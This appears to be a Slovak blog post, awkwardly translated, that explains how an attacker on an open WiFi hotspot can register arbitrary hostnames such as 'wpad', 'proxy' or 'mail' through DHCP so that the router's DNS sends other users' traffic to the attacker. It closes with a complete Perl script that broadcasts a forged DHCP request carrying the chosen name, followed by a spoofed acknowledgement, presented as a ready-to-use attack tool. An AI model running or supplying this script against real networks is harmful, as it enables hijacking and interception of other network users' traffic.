Hacking je disciplína, ktorá vyžadaje veľa kreativity a motivácie. Porozumenie príde postupom času so skúsenostiami.
Dnes by som chcel pokryť niektoré zaujímavé útočné vektory, ktoré môžu byť vykonávané ihneď ako útočník dostane prístup k sieti(otvorené WiFi siete a bezplatné WiFi HotSpoty sú v slušnej miere zraniteľné). Neskôr zmieňované útočné techniky sú vyvinuté Petkovými osobnými skúsenoťami s DHCP.
Jano navštívi verejný WiFi HotSpot. Akonáhle je spojený s WiFi sieťou, DHCP správa je medzičasom vymenená za jeho počítač a DHCP server, ktorý má väčšinou nastavenú vstupnú "bránu" defaultne. Na základe toho stavu Ip adresa je rezervovaná pre klienta a mašina je zhodená do siete. Z toho bodu Jano môže vidieť na mašinky pomocou ARP skenovania siete alebo dokonca vykonávanie niektorých pingov (ICMP), keď sieť nieje rozdelená, čo je dosť častý prípad.
Toto nieje nejáko obzvlášť zaujímavé. Ak si budete starostlivo všimať DHCP discover-offer-request-ack dialóg, budete informovaný, že každý paket zasvätený DHCP klientom obsahujúci niekoľko voliteľných oblastí reprezentuje meno klienta. Mnoho sietí/routerov bude spokojne prijímať mená a používať ich ako súčasť svojej DNS služby. Nehovoriac o tom, že DNS lookup-y budú analyzovať Ip adresy, a to je celkom preblém. Konečný záver je teda jasný: útočník môže registrovať hocijaké meno v rámci onej siete. "Aký je potom bezpečnostný problém?" . Verte alebo nie, je to celkom závažný bezpečnostný problém, ktorého pozornosť vzbudil nielen u bezpečnostných technikov.
Mnoho laptopov je konfigurovaných na používanie krátkych mien, keď sú využívané v rámci spoločnosti a v domácom prostredí. Jednoducho umiestnené proxy servery je pravdepodobne volané proxy, mailové servery sú volané mail, WPAD server je volaný wpad, a tak dalej. V situácií keď je klient spojený s HotSpotom, spýta sa na meno, ale nenájde povinnú ip a tak DNS server nemôže rozhonúť o mene. Ale toto nieje prípad s každou aktívnou DHCP sieťou. Meno klienta v DHCP môže byť stanovené použitím a ako taký môže vytvárať doménové mená pre proxy a mail. To znamená, že použitím jednoduchej UDP DHCP požiadavky, útočník môže zmeniť meno známej služby a presmerovať jeho traffic. T Situácia je potom ešte horšia ako sa zdá.
#!/usr/bin/env perl
use File::Basename;
use IO::Socket::INET;
use Net::DHCP::Packet;
use Net::DHCP::Constants;
$usage = "usage: ".basename($0)." \n";
$mac = shift or die $usage;
$ip = shift or die $usage;
$domain = shift or die $usage;
$name = shift or die $usage;
$request = Net::DHCP::Packet->new(
Xid => 0x11111111,
Flags => 0x0000,
Chaddr => $mac,
DHO_DHCP_MESSAGE_TYPE() => DHCPREQUEST(),
DHO_HOST_NAME() => $name,
DHO_VENDOR_CLASS_IDENTIFIER() => $mac,
DHO_DHCP_REQUESTED_ADDRESS() => $ip,
DHO_DOMAIN_NAME() => $domain,
DHO_DHCP_CLIENT_IDENTIFIER() => $mac
);
$ack = Net::DHCP::Packet->new(
Xid => 0x11111111,
Flags => 0x0000,
Chaddr => $mac,
DHO_DHCP_MESSAGE_TYPE() => DHCPACK(),
);
$handle = IO::Socket::INET->new(
Proto => 'udp',
Broadcast => 1,
PeerPort => '67',
LocalPort => '68',
PeerAddr => '255.255.255.255'
) or die "Socket: $@";
$handle->send($request->serialize()) or die "Error sending broadcast request:$!\n";
$handle->send($ack->serialize()) or die "Error sending broadcast act:$!\n";
No comments:
Post a Comment